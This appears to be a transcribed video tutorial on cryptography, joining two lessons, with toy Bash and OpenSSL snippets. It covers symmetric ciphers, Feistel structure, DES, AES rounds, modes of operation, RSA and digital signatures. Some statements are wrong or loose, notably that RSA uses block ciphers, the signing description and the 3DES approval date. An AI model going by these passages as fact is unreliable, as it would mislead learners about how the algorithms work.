The secret key shouldn't be sent along with the cipher text to the receiver, because that would defeat the entire purpose of using cryptography. Key exchange can be done beforehand using other algorithms, like the Diffie-Hellman key exchange protocol.

For example, if Paul wants to send a simple message to Jane, they need to have a single encryption key that both of them must keep secret to prevent snooping by malicious actors. It can be generated by either one of them, but it must belong to both of them before the messages start flowing. Suppose the message "I am ready" is converted into cipher text using a specific substitution cipher by Paul; in that case, Jane must also be aware of the substitution shift to decrypt the cipher text once it reaches her. In the scenario where someone manages to grab the cipher text mid-transit to try and read the message, not having the secret key renders any would-be snooper helpless.

Symmetric key algorithms like the Data Encryption Standard have been in use since the 1970s, while popular ones like AES have become the industry standard today. With the entire architecture of symmetric cryptography depending on the single key being used, you can understand why it's of paramount importance to keep it secret on all occasions. The side effect of having a single key for encryption and decryption is that it becomes a single point of failure: anyone who gets their hands on it can read all the encrypted messages, often without the knowledge of the sender or the receiver. So it is a priority to keep the encryption and decryption key private at all times. Should it fall into the wrong hands, a third party can send messages to either the sender or the receiver using the same key to encrypt them, and upon receiving and decrypting such a message with the key, it is impossible to guess its origin.
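The Diffie-Hellman exchange mentioned above can be sketched with toy numbers in Bash using `bc` (real deployments use enormous primes; p, g, and the private values here are tiny and purely illustrative):

```bash
#!/usr/bin/env bash
# Toy Diffie-Hellman: both parties derive the same secret without ever sending it.
p=23; g=5          # public modulus and generator (toy sizes)
a=6                # Alice's private value, never transmitted
b=15               # Bob's private value, never transmitted

A=$(echo "$g^$a % $p" | bc)   # Alice sends A = g^a mod p over the open channel
B=$(echo "$g^$b % $p" | bc)   # Bob sends   B = g^b mod p over the open channel

secret_alice=$(echo "$B^$a % $p" | bc)   # (g^b)^a mod p
secret_bob=$(echo "$A^$b % $p" | bc)     # (g^a)^b mod p
echo "Alice: $secret_alice, Bob: $secret_bob"   # both print 2
```

An eavesdropper sees only p, g, A, and B; recovering the shared secret from those requires solving a discrete logarithm, which is the one-way function the scheme relies on.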

If the sender somehow transmits the secret key along with the cipher text, anyone can intercept the package and access the information. Consequently, this encryption category is termed private key cryptography, since a big part of the data's integrity rides on the promise that the users can keep the key secret. This terminology contrasts with asymmetric key cryptography, which is called public key cryptography because it has two different keys at play, one of which is public.

Provided we manage to keep the keys secret, we still have to choose what kind of cipher we want to use to encrypt the information. In symmetric key cryptography, there are broadly two categories of ciphers we can employ. Let us have a look.

Stream ciphers are algorithms that encrypt basic information one bit at a time. The unit can change depending on the algorithm being used, but usually it relies on a single bit or byte to do the encryption. This is the relatively quicker alternative, considering the algorithm doesn't have to deal with blocks of data at a single time. Every piece of data that goes into the encryption can, and needs to, be converted into binary format; in stream ciphers, each binary digit is encrypted one after the other. The most popular stream ciphers are RC4, Salsa20, and Panama. The binary data is passed through an encryption key, which is a randomly generated bit stream; upon passing it through, we receive the cipher text that can be transferred to the receiver without fear of man-in-the-middle attacks. The binary data can be passed through an algorithmic function that uses XOR operations, as is most often the case, or any other mathematical calculations whose singular purpose is scrambling the data. The encryption key is generated using a random bit-stream generator, and it acts as a supplement in the algorithmic function. The output is in binary form, which is then converted into decimal or hexadecimal format to give our final cipher text.

On the other hand, block ciphers dissect the raw information into chunks of data of fixed size. The size of these blocks depends on the exact cipher being used: a 128-bit block cipher will break the plain text into blocks of 128 bits each and encrypt those blocks instead of a single digit. Once these blocks are encrypted individually, they are chained together to form the final cipher text. Block ciphers are much slower, but they are more tamper-proof and are used in some of the most widely deployed algorithms today. Just like with stream ciphers, the original plain text is converted into binary format before the process begins. Once the conversion is complete, the blocks are passed through the encryption algorithm along with the encryption key, which gives us the encrypted blocks of binary data. Once these blocks are combined, we get a final binary string, which is then converted into hexadecimal format to get our cipher text. Today, the most popular symmetric key algorithms, like AES, DES, and 3DES, are all subsets of the block cipher methodology.

With so many factors coming into play, there are quite a few things symmetric key cryptography excels at, while falling short in some other areas. Symmetric key cryptography is the much faster variant when compared to asymmetric cryptography. There is only one key in play, unlike in asymmetric encryption, and this drastically improves calculation speed during encryption and decryption. Similarly, the performance of symmetric encryption is much more efficient under the same computational limitations; fewer calculations help in better memory management for the whole system.
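The XOR-based stream idea is small enough to demonstrate directly in Bash (a toy sketch: the keystream is hard-coded here, whereas a real stream cipher generates it pseudo-randomly from the key):

```bash
#!/usr/bin/env bash
# Toy stream cipher: XOR each plaintext byte with one keystream byte.
plain="HELLO"
keystream=(7 13 42 99 5)    # pretend keystream, one value per byte

# Encrypt: plaintext byte XOR keystream byte
cipher=()
for ((i = 0; i < ${#plain}; i++)); do
  byte=$(printf '%d' "'${plain:i:1}")      # character -> numeric byte value
  cipher+=( $(( byte ^ keystream[i] )) )
done
echo "cipher bytes: ${cipher[*]}"

# Decrypt: XOR with the SAME keystream restores the plaintext
for ((i = 0; i < ${#cipher[@]}; i++)); do
  printf "\\x$(printf '%02x' $(( cipher[i] ^ keystream[i] )))"
done
echo
```

Because XOR is its own inverse, encryption and decryption are literally the same operation, which is why keystream reuse is so dangerous in real stream ciphers.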
Bulk amounts of data that need to be encrypted are very well suited to symmetric algorithms, since they are much quicker. Handling large amounts of data becomes simple and easy in servers and data farms, which helps with better latency during data recall and fewer dropped packets. Thanks to its simple single-key structure, symmetric key cryptography is much easier to set up a communication channel with, and it offers much more straightforward maintenance duties. Once the secret key is transmitted to both the sender and the receiver without any mishandling, the rest of the system aligns easily and everyday communication becomes easy and secure. If the algorithm is applied as per the documentation, symmetric algorithms are very robust and can encrypt vast amounts of data with very little overhead.

DES stands for Data Encryption Standard. It is a symmetric key cipher that is used to encrypt and decrypt information in a block-by-block manner; each block is encrypted individually, and the blocks are later chained together to form our final cipher text, which is then sent to the receiver. DES takes the original, unaltered piece of data, called the plain text, in 64-bit blocks, and converts it into encrypted text, called the cipher text. During encryption it uses 48-bit round keys, derived from a single 56-bit key, and it follows a specific structure called the Feistel cipher structure throughout. It is a symmetric key algorithm, which means DES can reuse the key used during encryption to decrypt the cipher text back to the original plain text. Once the 64-bit blocks are encrypted, they can be combined before being transmitted.

Let's take a look at the origin of DES and the reason it was founded. DES is based on a Feistel block cipher called Lucifer, developed in 1971 by IBM cryptography researcher Horst Feistel. DES uses 16 rounds of this Feistel structure, with a different round key for each round, and it utilizes a round function that takes two inputs and provides a single output variable. DES became the United States' approved federal encryption standard in November 1976 and was later reaffirmed as a standard in 1983, 1988, and finally 1999.

Eventually, though, DES was cracked, and it was no longer considered a secure solution for official routes of communication. Consequently, Triple DES was developed. Triple DES is a symmetric key block cipher that applies the DES cipher three times: encrypt with the first key, decrypt with the second key, and encrypt again with the third key. There is also a two-key variation, in which the first and third keys are duplicates of each other. But Triple DES was ultimately deemed too slow for the growing need for fast communication channels, and many fell back to using DES for encrypting messages.

In order to find a better alternative, a public, worldwide competition was organized, inviting cryptographers to develop their own algorithms as proposals for the next global standard. This is where the Rijndael algorithm came into play, later credited as the next Advanced Encryption Standard. For a long time, DES was the standard for data encryption and data security; its reign ended in 2002, when the Advanced Encryption Standard finally replaced DES as the accepted standard following that public competition.
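Before digging into the Feistel structure itself: Triple DES, mentioned above, is still exposed by OpenSSL as `des-ede3-cbc` (encrypt-decrypt-encrypt). A quick round trip, assuming your OpenSSL build still ships this legacy cipher:

```bash
# Encrypt and decrypt with Triple DES (legacy; prefer AES for anything new)
printf 'legacy message' | openssl enc -des-ede3-cbc -pbkdf2 \
    -pass pass:demo-secret -out legacy.enc
openssl enc -d -des-ede3-cbc -pbkdf2 -pass pass:demo-secret -in legacy.enc
```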
To understand the structure of a Feistel cipher, you can use the following image as a reference. The block being encrypted is divided into two parts; one part is passed into the round function, while the other part is XORed with the function's output. The function also uses the encryption key, which differs for each individual round. This keeps going until the last step, where the right-hand side and the left-hand side are swapped, and here we receive our final cipher text. For the decryption process, the entire procedure is reversed, from the order of the round keys to the block sorting: if the entire process is repeated in reverse order, we eventually get back our plain text. This simplicity helps the overall speed, though it was later detrimental to the efficiency of the algorithm, and hence its security was compromised.

A Feistel block cipher is a structure used to derive many symmetric block ciphers, such as DES, which we discussed above. The Feistel cipher proposes a structure that implements substitution and permutation alternately, so that we can obtain cipher text from the plain text and vice versa. This helps in reducing the redundancy of the program and increases the complexity to combat brute-force attacks. The Feistel cipher is actually based on the Shannon structure, proposed in 1945, which highlights the implementation of alternating confusion and diffusion; the Feistel structure itself was suggested by Horst Feistel and is considered a backbone in the development of many symmetric block ciphers. As we already discussed, the Feistel cipher structure can be completely reversed; however, to decrypt the information by reversing the Feistel structure, we will need the exact round functions and the key order.

To understand how the blocks are calculated, we take a 64-bit plain text and divide it into two equal halves of 32 bits each. The right half is immediately transferred to the next round, where it becomes the new left half of the second round. The right half is also passed into a function that uses an encryption key unique to each round of the Feistel cipher. Whatever the function gives as output is used as an XOR input together with the left half of the initial plain text, and that XOR output becomes the right half of the second round. This entire process constitutes a single round in the Feistel cipher.

Taking into account what happens inside the round function: we take one half of the block and pass it through an expansion box, whose job is to increase the size of the half from 32 bits to 48 bits. This is done to make the text compatible with the 48-bit round keys we generated beforehand. Once we pass it through the XOR function with the round key, we get 48-bit text as output. Now remember, a half should be 32 bits, so this 48-bit output is passed into a substitution box, which reduces its size from 48 bits back to a 32-bit output; that output is then XORed with the other half of the plain text.

A block cipher is considered safer if the size of the block is large, but large block sizes can also slow down encryption and decryption speed. Generally the size is 64 bits, though some modern block ciphers, like AES, have a 128-bit block size as well. The security of a block cipher increases with increasing key size, but larger key sizes may also reduce the speed of the process: earlier, 64-bit keys were considered sufficient, while modern ciphers need 128-bit keys due to the increasing power of today's computers. An increasing number of rounds likewise increases the security of the block cipher, but rounds are inversely proportional to the speed of encryption. A highly complex round function enhances the security of the block cipher, albeit we must maintain a balance between speed and security.
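The swap-and-XOR mechanics are easy to see in a toy Feistel network in Bash (a sketch only: the block is 16 bits, the round function is an arbitrary stand-in, and nothing here resembles real DES strength):

```bash
#!/usr/bin/env bash
# Toy 4-round Feistel network on a 16-bit block (two 8-bit halves).
# F is a placeholder round function: XOR with the round key, then rotate left.
F() { echo $(( ((($1 ^ $2) << 1) | (($1 ^ $2) >> 7)) & 0xFF )); }

feistel() {
  local L=$1 R=$2; shift 2
  for k in "$@"; do                       # one pass per round key
    local newR=$(( L ^ $(F "$R" "$k") ))  # L XOR F(R, k)
    L=$R; R=$newR                         # halves slide over
  done
  echo "$R $L"                            # final swap of the halves
}

keys=(19 55 7 102)
read -r c1 c2 <<< "$(feistel 0xAB 0xCD "${keys[@]}")"
echo "cipher halves: $c1 $c2"

# Decryption is the SAME network run with the round keys in reverse order
read -r p1 p2 <<< "$(feistel "$c1" "$c2" 102 7 55 19)"
printf 'plain halves: 0x%02X 0x%02X\n' "$p1" "$p2"   # 0xAB 0xCD again
```

Note that F never needs to be invertible; the XOR structure alone guarantees the process reverses, which is exactly the property DES exploits.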
A symmetric block cipher is implemented in software applications to achieve better execution speed; there is no use for an algorithm if it cannot be implemented in a real-life framework that helps organizations encrypt or decrypt their data in a timely manner. Now that we understand the basics of Feistel ciphers, we can take a look at how DES manages to run through 16 rounds of this structure and provide the cipher text at the end.

In simple terms, DES takes a 64-bit plain text and converts it into a 64-bit cipher text, and since we're talking about symmetric algorithms, the same key is used when decrypting the data as well. We first take the 64-bit plain text and pass it through an initial permutation function, whose job is to divide the block into two parts so that we can perform Feistel cipher rounds on it. There are multiple rounds performed in the DES algorithm, namely 16 rounds of the Feistel cipher structure, and each of these rounds needs a key. Initially we take a single 56-bit cipher key and pass it to a round key generator, which generates 16 different keys, one for each round in which the Feistel cipher is run. These keys are passed to the rounds as 48 bits, and the size of these 48-bit keys is the reason we use the expansion and substitution boxes in the round functions of the Feistel cipher. After passing through all these rounds, we reach round 16, where the final key is passed on from the round key generator, and we perform a final permutation in which the halves are swapped; here we get our final cipher text. This is the entire process of DES, with 16 rounds of Feistel ciphers encompassed in it.

To decrypt our cipher text back to the plain text, we just have to reverse the process we performed in the DES algorithm, reversing the key order along with the functions. This kind of simplicity is what gave DES its bonus when it comes to speed, but it was eventually detrimental to the overall security of the program.

When it comes to modes of operation, DES has five different modes to choose from. One of these is Electronic Code Book (ECB), in which each 64-bit block is encrypted and decrypted independently. We also have Cipher Block Chaining, or the CBC method: here each 64-bit block depends on the previous one, and all of them use an initialization vector. We have the Cipher Feedback (CFB) mechanism, where the preceding cipher text becomes the input to the encryption algorithm, producing a pseudo-random output, which in turn is XORed with the plain text. There is an Output Feedback (OFB) method as well, which is the same as Cipher Feedback except that the encryption algorithm's input is the output from the preceding DES stage. The Counter (CTR) method takes a different approach: each plain text block is XORed with an encrypted counter, and the counter is then incremented for each subsequent block. There are a few other alternatives to these modes of operation, but the five mentioned above are the most widely used in the industry and the ones recommended by cryptographers worldwide.

Let's take a look at the future of DES. The dominance of DES ended in 2002, when the Advanced Encryption Standard replaced the DES encryption algorithm as the accepted standard.
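The difference between ECB and CBC is easy to see on the command line (a sketch assuming OpenSSL; the hex key and IV passed to `-K`/`-iv` are throwaway demo values):

```bash
# Two identical 16-byte plaintext blocks: ECB leaks the repetition, CBC hides it.
printf 'SIXTEEN BYTE MSGSIXTEEN BYTE MSG' > twice.txt

openssl enc -aes-128-ecb -K 000102030405060708090a0b0c0d0e0f \
    -in twice.txt | xxd          # the first two 16-byte rows are identical

openssl enc -aes-128-cbc -K 000102030405060708090a0b0c0d0e0f \
    -iv aabbccddeeff00112233445566778899 \
    -in twice.txt | xxd          # every row differs, thanks to chaining
```

Since `xxd` prints 16 bytes per row, each row lines up with one cipher block, making the repeated ECB blocks visible at a glance.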
This was done following a public competition to find a replacement, and NIST officially withdrew the standard in May 2005, although Triple DES remains approved for some sensitive government information through 2030. NIST also had to move on from the DES algorithm because its key length was too short given the increased processing power of newer computers. Encryption strength is related to the size of the key, and DES found itself a victim of the ongoing technological advances in computing: we have reached a point where a 56-bit key is no longer a real challenge for computers to crack. Note that just because DES is no longer the NIST federal standard does not mean it is no longer in use; Triple DES is still used today, though it is considered a legacy encryption algorithm.

To get a better understanding of what these keys and cipher texts look like, we can use an online tool. As we already know, a key is mandatory for encrypting any kind of data. This key can be generated using mathematical functions or a computerized key generation program, such as this website offers, and it can be based on any piece of text; let's say the phrase is "simply learn" in our example. Once the key is settled, we provide the plain text, or clear text, that needs to be encrypted using the aforementioned key. Suppose our sentence for this example is "this is my first message." We have now satisfied two prerequisites: the message and the key.

Another variable that comes into play is the mode of operation. We have already learned about five different modes, and while we can see some other options here as well, let us go with the CBC variant, which is the Cipher Block Chaining method. One of CBC's key characteristics is its chaining process: it causes the decryption of a block of cipher text to depend on all the preceding cipher text blocks. As a result, the validity of every block is tied to the adjacent preceding blocks, a single bit error in one cipher text block affects the decryption of all subsequent blocks, and rearranging the order of the blocks can cause the decryption process to become corrupted.

Regarding the manner of displaying the binary information, we have two options here: we can go with either Base64 or the hexadecimal format. Let's go with Base64 for now, and as you can see, the cipher text is readily available. Base64 is a little more efficient than hex, so we get a shorter cipher text string with Base64, even though the underlying ciphertext is the same size in both cases. The hex string is longer because Base64 spends four characters for every three bytes, while hex spends two characters for every single byte; hence Base64 turns out to be the more compact encoding.

Now, to decrypt the cipher text, we go by the same format and choose Base64. We copy the cipher text into a decryption tool and make sure the key we are using is exactly the same; we choose the same mode of operation and the correct encoding format as well, which is Base64 in this case. As you can see, the decryption is complete and we get the plain text back. If you keep everything else the same but change only the encoding format, it will not be able to decrypt anything.

Unfortunately, DES has become rather easy to crack, even without the help of the key. The Advanced Encryption Standard is still on top when it comes to symmetric encryption security and will likely stay there for a while. Eventually, with so much growth in computing power, a stronger algorithm became necessary to safeguard our personal data.
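You can verify the Base64-versus-hex size claim with standard tools (a sketch; the 32 random bytes stand in for any ciphertext):

```bash
# The same 32 ciphertext bytes encoded two ways
head -c 32 /dev/urandom > blob.bin
base64 < blob.bin | tr -d '\n' | wc -c    # 44 characters (4 per 3 bytes, padded)
xxd -p  < blob.bin | tr -d '\n' | wc -c   # 64 characters (2 per byte)
```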
As solid as DES was, the computers of today can easily break its encryption with repeated attempts, rendering the data's security helpless. To counter this dilemma, a new standard was introduced, termed the Advanced Encryption Standard, or the AES algorithm.

Let's learn what the Advanced Encryption Standard is. The AES algorithm, also known as the Rijndael algorithm, is a symmetric block cipher with a block size of 128 bits; data is converted into cipher text using keys of 128, 192, or 256 bits, and it is implemented in software and hardware throughout the world to encrypt sensitive data. The National Institute of Standards and Technology, also known as NIST, started development of AES in 1997, when it announced the need for an alternative to the Data Encryption Standard. The new internet needed a replacement for DES because of its small key size; with increasing computing power, it was considered unsafe against exhaustive key search attacks. Triple DES was designed to overcome this problem, but it was deemed too slow to be deployed on machines worldwide. Strong cases were presented by the MARS, RC6, Serpent, and Twofish algorithms, but it was the Rijndael encryption algorithm, now known as AES, that was eventually chosen as the standard symmetric key encryption algorithm. Its selection was formalized with the release of Federal Information Processing Standards Publication 197 in November of 2001, approved by the US Secretary of Commerce.

Now that we understand the origin of AES, let us have a look at the features that make the AES encryption algorithm unique. The AES algorithm uses a substitution-permutation, or SP, network. It consists of multiple rounds to produce the cipher text, with a series of linked operations, including replacing inputs with specific outputs (substitutions) and others that involve bit shuffling (permutations). At the beginning of the encryption process we start out with a single key, which can be a 128-bit, a 192-bit, or a 256-bit key; eventually this one key is expanded to be used in multiple rounds throughout the encryption and decryption cycle. Interestingly, AES performs all its calculations on byte data instead of bit data, as seen in the case of the DES algorithm; therefore, AES treats the 128 bits of a clear text block as 16 bytes. The number of rounds during the encryption process depends on the key size being used: a 128-bit key dictates 10 rounds, a 192-bit key dictates 12 rounds, and a 256-bit key calls for 14 rounds. A round key is required for each of these rounds, but since only one key is input into the algorithm, that single key needs to be expanded to provide a key for each round, including round zero.

With so many mathematical calculations going on in the background, there are bound to be a lot of steps throughout the procedure, so let's have a look at the steps followed in AES. Before we move ahead, we need to understand how data is stored during the process of AES encryption. Everything in the process is stored in a 4x4 matrix format, also known as a state array, and we will be using these state arrays to transmit data from one step to another and from one round to the next. Each round takes a state array as input and gives a state array as output to be transferred into the next round. It is a 16-byte matrix, with each cell representing one byte and each set of four bytes representing a word, so every state array has a total of four words representing it. As we previously discussed, we take a single key and expand it for the number of rounds that the key needs to be used in.
Let's say the number of rounds is n; then the key has to be expanded to n + 1 round keys, because the first round key is used in round zero. Each expanded key is also a state array holding four words. Every key is used for a single round, and the first key is used as a round key before any round begins.

In the very beginning, the plain text is captured and passed through an XOR function with the round key as a supplement; this key can be considered the first key from the n + 1 expanded set. Moving on, the state array resulting from that step is passed into a byte substitution process. Beyond that, there is a provision to shift rows in the state array. Later on, the state array is mixed with a constant matrix to shuffle its columns in the MixColumns segment, after which we add the round key for that particular round. The last four steps mentioned are part of every single round that the encryption algorithm goes through, and the state arrays are passed from one round to the next as input. In the last round, however, we skip the MixColumns portion, with the rest of the process remaining unchanged.

But what are these byte substitution and row shifting processes? Let's look at each step in more detail. In the first step, the plain text is stored in a state array and is XORed with K0, the first key in the expanded key set. This step is performed once on the block before the rounds begin, while the add-round-key operation is also repeated at the end of each round as the iterations demand. The state array is XORed with the key to get a new state array, which is then passed as input to the sub-bytes process.

In the second stage we have byte substitution: we leverage an S-box, called a substitution box, to switch the data among the elements. Every single byte is converted into a hexadecimal value having two parts: the first part denotes the row value and the second part denotes the column value. The entire state array is passed through the S-box to create a brand new state array, which is then passed as input to the row shifting process. The 16 input bytes are replaced by looking up a fixed table given in the design, and we finally get a matrix with four rows and four columns.

When it comes to row shifting, each byte in the four rows of the matrix is shifted to the left; an entry that falls off is reinserted to the right of the row. The shift is done as follows: the first row is not moved in any way, the second row is shifted one position to the left, the third row is shifted two positions to the left, and the fourth row is shifted three positions to the left. The result is a new matrix containing the same 16 bytes, but moved in relation to each other to boost the complexity of the program.

In MixColumns, each column of four bytes is then replaced using a special mathematical function, which takes the four bytes of a column as input and outputs four completely new bytes; we get a new matrix of the same 16-byte size. It should be noted that this phase is not performed in the last round of the iteration. When it comes to adding a round key, the 16 bytes of the matrix are treated as 128 bits and XORed with the 128 bits of the round key. If this is the last round, the output is the cipher text; if we still have rounds remaining, the resulting 128 bits are interpreted as 16 bytes and we start another similar round.
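The row shifting step is mechanical enough to sketch in a few lines of Bash (a toy illustration: the state is a flat 16-element array in row-major order, and the values are row/column labels rather than real bytes):

```bash
#!/usr/bin/env bash
# ShiftRows on a 4x4 state: row r is rotated left by r positions.
state=(00 01 02 03  10 11 12 13  20 21 22 23  30 31 32 33)
shifted=()
for r in 0 1 2 3; do
  for c in 0 1 2 3; do
    # new[r][c] = old[r][(c + r) % 4]
    shifted[r*4 + c]=${state[r*4 + (c + r) % 4]}
  done
done
echo "${shifted[@]}"
# row 0 unchanged, row 1 rotated by 1, row 2 by 2, row 3 by 3:
# 00 01 02 03  11 12 13 10  22 23 20 21  33 30 31 32
```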
Let's take an example to understand how all these processes work. If our plain text is the string "2192," we first convert it into hexadecimal format, and we use the encryption key "thats my kung fu," converted into hexadecimal format as well. As per the guidelines, we use a single key, which is later expanded into n + 1 keys; in this case, that means 11 keys for 10 rounds.

In round zero, we add the round key: the plain text is XORed with K0, and we get a state array that is passed as input to the substitution bytes process. In the substitution bytes process, we leverage an S-box to substitute each byte with a completely new byte; the state array we receive is passed as input to the row shifting process of the next step. In row shifting, each element is shifted a few places to the left, with the first row shifted by zero places, the second row by one place, the third row by two places, and the last by three. The state array received from row shifting is passed as input to MixColumns, where we multiply the state array by a constant matrix, after which we receive a new state array to pass on to the next step. Finally, the new state array is XORed with the round key of that particular iteration, and whatever state array we receive here becomes the output of this particular round. Since this is the first round of the entire encryption process, the state array we receive is passed as input to the next round. We repeat this process for the remaining rounds, and the final state array, denoted in hexadecimal format, becomes our final cipher text, which we can use for transferring information between sender and receiver.

Let's take a look at the applications of AES in the world. AES finds most use in the area of wireless security, in order to establish a secure mode of authentication between routers and clients; highly secure mechanisms like WPA and WPA2-PSK are extensively used in securing Wi-Fi endpoints with the help of Rijndael's algorithm. AES also helps in SSL/TLS encryption, which is instrumental in encrypting our internet browser sessions; it works in tandem with asymmetric encryption algorithms to make sure the web browser and web server are properly configured and use encrypted channels for communication. AES is also prevalent in general file encryption across various formats, ranging from documents to media files; a large key allows people to encrypt and decrypt data with the maximum security possible. AES is also used for processor security in hardware appliances, to prevent machine hijacking, among other things.

As a direct successor to the DES algorithm, there are some aspects in which AES provides an immediate advantage. When it comes to key length, the biggest flaw in the DES algorithm was its small key size, which is easily vulnerable by today's standards; AES offers 128-, 192-, and 256-bit key lengths to bolster security further. The block size is also larger in AES, owing to the greater complexity of the algorithm. The number of rounds in DES is fixed, irrespective of the plain text being used, whereas in AES the number of rounds depends on the key length being used for the particular iteration, thereby providing more randomness and complexity in the algorithm. The DES algorithm is considered simpler than AES, even though AES beats DES when it comes to the relative speed of encryption and decryption; this makes the Advanced Encryption Standard much more streamlined to deploy in frameworks and systems worldwide compared to the Data Encryption Standard.
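You can get a feel for that speed difference on your own machine with OpenSSL's built-in benchmark (a sketch, assuming the `speed` subcommand and these EVP cipher names are available in your build):

```bash
# Benchmark AES vs Triple DES throughput locally
openssl speed -evp aes-128-cbc
openssl speed -evp des-ede3-cbc
# AES typically reports several times the bytes/second of 3DES,
# especially on CPUs with AES-NI hardware instructions.
```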
Hello! In our last video on cryptography, we took a look at symmetric key cryptography: we used a single private key for both the encryption and decryption of data, and it works very well in theory. Let's look at a more realistic scenario now.

Let's meet Joe. Joe is a journalist who needs to communicate with Ryan via long-distance messaging. Due to the critical nature of the information, people are waiting for any message to leave Joe's house so that they can intercept it. Now, Joe can easily use symmetric key cryptography to send encrypted data, so that even if someone intercepts the message, they cannot understand what it says. But here's the tricky part: how will Joe send the required decryption key to Ryan? The sender of the message as well as the receiver need to have the same decryption key so that they can exchange messages; otherwise, Ryan cannot decrypt the information even when he receives the cipher text. If someone intercepts the key while it is being transmitted, there is no use in employing cryptography, since the third party can now decode all the information easily. Key sharing is a risk that will always exist when symmetric key cryptography is being used. Thankfully, asymmetric key encryption has managed to fix this problem.

This is Baba from Simply Learn, and welcome to this video on asymmetric key cryptography. Let's take a look at what we are going to learn today. We begin by explaining what asymmetric key cryptography is and how it works; we take a look at its applications and uses; we understand why it's called public key cryptography; we then learn a little bit about RSA encryption; and finally we cover the advantages of asymmetric key cryptography over symmetric key cryptography.

Let's understand what asymmetric key cryptography is. Asymmetric encryption uses a double layer of protection: there are two different keys at play here, a private key and a public key. The public key is used to encrypt the information pre-transit, and the private key is used to decrypt the data post-transit. This pair of keys must belong to the receiver of the message. The public key can be shared via messaging, blog posts, or key servers, and there are no restrictions. As you can see in the image, the two keys work together in the system: the sender first encrypts the message using the receiver's public key, after which we receive the cipher text. The cipher text is then transmitted to the receiver without any other key. On getting the cipher text, the receiver uses his private key to decrypt it and get the plain text back. There has been no requirement for any key exchange throughout this process, therefore solving the most glaring flaw of symmetric key cryptography. The public key, known to everyone, cannot be used to decrypt the message, and the private key, which can decrypt the message, need not be shared with anyone. The sender and receiver can exchange personal data using the same set of keys as often as needed.

To understand this better, take the analogy of your mailbox. Anyone who wants to send you a letter has access to the box and can easily share information with you; in a way, you can say the mailbox is publicly available to all. But only you have access to the key that can open the mailbox and read the letters in it, and this is how the private key comes into play. No one can intercept the message and read its contents, since it's encrypted; once the receiver gets the contents, he can use his private key to decrypt the information.
Both the public key and the private key are generated together, so they are interlinked, and you cannot substitute another private key to decrypt the data. In another example, if Alice wants to send a message to Bob, let's say it reads "Call me today," she must use Bob's public key while encrypting the message. Upon receiving the cipher message, Bob can proceed to use his private key to decrypt it, and hence complete security is attained during transmission without any need to share a key.

Since this type of encryption is highly secure, it has many uses in areas that require high confidentiality. It is used to manage digital signatures, so there is valid proof of a document's authenticity. With so many aspects of business transitioning to the digital sphere, critical documents need to be verified before being considered authentic and acted upon. Thanks to asymmetric cryptography, senders can now sign documents with their private keys: anyone who needs to verify the authenticity of such a signature can use the sender's public key to decrypt it, and since the public and private keys are linked to each other mathematically, it's impossible to repeat this verification with duplicate keys. Document encryption has been made very simple by today's standards, but the background implementation follows a similar approach.

In blockchain architecture, asymmetric key cryptography is used to authorize transactions and maintain the system. Thanks to its two-key structure, changes are reflected across the blockchain's peer-to-peer network only if they are approved from both ends; along with asymmetric key cryptography's tamper-proof architecture, its non-repudiation characteristic also helps in keeping the network stable.

We can also use asymmetric key cryptography, combined with symmetric key cryptography, to maintain SSL- or TLS-encrypted browsing sessions, making sure nobody can steal our personal information when accessing banking websites or the internet in general. It plays a significant role in verifying website server authenticity, exchanging the necessary encryption keys, and generating a session using those keys to ensure maximum security, instead of the rather insecure HTTP website format. Security parameters differ on a session-by-session basis, so the verification process is consistent and utterly essential to modern data security.

Another great use of the asymmetric key cryptography structure is transmitting keys for symmetric key cryptography. With the most significant difficulty in symmetric encryption being key exchange, asymmetric keys can clear that shortcoming. The original message is first encrypted using a symmetric key; the key used for encrypting the data is then itself converted into cipher text using the receiver's public key. Now we have two ciphertexts to transmit to the receiver. On receiving both, the receiver uses his private key to decrypt the symmetric key, and he can then use that key to decrypt the original information. While this may seem more complicated than using asymmetric cryptography alone, symmetric encryption algorithms are much better optimized for vast amounts of data, so on many occasions, encrypting just the key with asymmetric algorithms is the more efficient and secure route.

You might remember us discussing why symmetric encryption was called private key cryptography; let us now understand why asymmetric encryption falls under public key cryptography. We have two keys at our disposal: the encryption key is available to everyone, while the decryption key is supposed to be kept private.
Unlike symmetric key cryptography, there is no need to share anything privately to have an encrypted messaging system. To put that into perspective, we share our email address with anyone looking to communicate with us; it is supposed to be public by design, while our email login credentials are private and help prevent any data mishandling. Since nothing needs to be hidden from the world for people to send us encrypted information, this category is called public key cryptography.

There are quite a few algorithms in use today that follow the architecture of asymmetric cryptography, none more famous than RSA encryption. RSA is the most widely used public key encryption standard using the asymmetric approach. Named after its founders, Rivest, Shamir, and Adleman, it uses block ciphers to obscure the information. If you are unfamiliar with how block ciphers work: they are encryption algorithms that divide the original data into blocks of equal size, with the block size depending on the exact cipher being used; once broken down, these blocks are encrypted individually and later chained together to form the final cipher text. Widely considered the most secure form of encryption, albeit relatively slower than symmetric encryption algorithms, RSA is widely used in web browsing, secure identification, VPNs, emails, and other chat applications.

With so many variables in play, there must be some advantages that give asymmetric key cryptography an edge over the traditional symmetric encryption methodologies. Let's go through some of them. There is no need for any reliable key-sharing channel in asymmetric encryption: that added risk in private key cryptography has been completely eliminated in the public key architecture, since the key that is made public cannot decrypt any confidential information, and the only key that can decrypt never needs to be shared publicly under any circumstance. We also have much more extensive key lengths in RSA encryption and other asymmetric algorithms, like 2048-bit and 4096-bit keys; larger keys are much harder to break into via brute force and are much more secure.

Asymmetric key cryptography can also be used as proof of authenticity, since only the rightful owner of the keys can generate a message that the matching key will decrypt. The situation can be reversed as well: encryption is done using the private key and decryption is done with the public key, which would not function if the correct private key had not been used to generate the message, hence proving the authenticity of the owner. It also has a tamper-protection feature: the message cannot be intercepted and changed without invalidating the private key used to encrypt the data. In that case, the public key would fail to decrypt the message, making it easy to realize the information is not 100% legitimate, when and where the case requires.

Now that we have had a proper revision, let's understand what digital signatures are before moving on to the algorithm. The objective of digital signatures is to authenticate and verify documents and data; this is necessary to avoid tampering and digital modification or forgery of any kind during the transmission of official documents. They work on the public key cryptography architecture, with one exception: typically, an asymmetric key system encrypts using a public key and decrypts with a private key, but for digital signatures the reverse is true. The signature is encrypted using the private key and is decrypted with the public key; because the keys are linked together, decoding the signature with the public key verifies that the proper private key was used to sign the document, thereby verifying the signature's provenance.
Let's go through each step to understand the procedure thoroughly. In step one, we have M, the original plain text message, which is passed to a hash function, denoted by H, to create a digest. Next, the message is bundled together with the hash digest and encrypted using the sender's private key, and the encrypted bundle is sent to the receiver, who can decrypt it using the sender's public key. Once the message is decrypted, it is passed through the same hash function, H, to generate a similar digest, and the newly generated hash is compared with the bundled hash value received along with the message. If they match, data integrity is verified.

